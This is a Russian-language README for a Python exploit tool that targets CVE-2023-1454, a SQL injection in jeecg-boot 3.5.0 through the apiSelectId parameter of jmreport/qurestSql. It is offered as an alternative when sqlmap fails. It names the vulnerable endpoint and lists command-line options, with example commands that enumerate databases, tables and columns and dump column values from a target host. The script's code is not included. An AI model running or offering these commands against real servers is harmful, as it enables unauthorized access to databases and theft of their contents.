
В случаях, когда sqlmap не может выполнить инъекцию JeecgBoot SQL(CVE-2023-1454), можно использовать этот скрипт.
В версии 3.5.0 jeecg-boot существует уязвимость SQL-инъекции, которая возникает из-за проблем безопасности в файле jmreport/qurestSql. Через параметр apiSelectId происходит SQL-инъекция.
python3 CVE-2023-1454.py
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Specify the base URL
--current-db View current database
--dbs View all databases
-D DATABASE, --database DATABASE
Specify the database name
--tables View tables in the specified database
-T TABLE, --table TABLE
Specify the table name
--columns View columns in the specified table
-C COLUMN, --column COLUMN
Specify the column name
Example:
python3 CVE-2023-1454.py -u xxx.com --current-db Просмотр текущей базы данных
python3 CVE-2023-1454.py -u xxx.com -dbs Просмотр всех баз данных
python3 CVE-2023-1454.py -u xxx.com -D имя_базы_данных --tables Просмотр таблиц в базе данных
python3 CVE-2023-1454.py -u xxx.com -D имя_базы_данных -T имя_таблицы --columns Просмотр столбцов в таблице
python3 CVE-2023-1454.py -u xxx.com -D имя_базы_данных -T имя_таблицы -C имя_столбца Просмотр значений столбца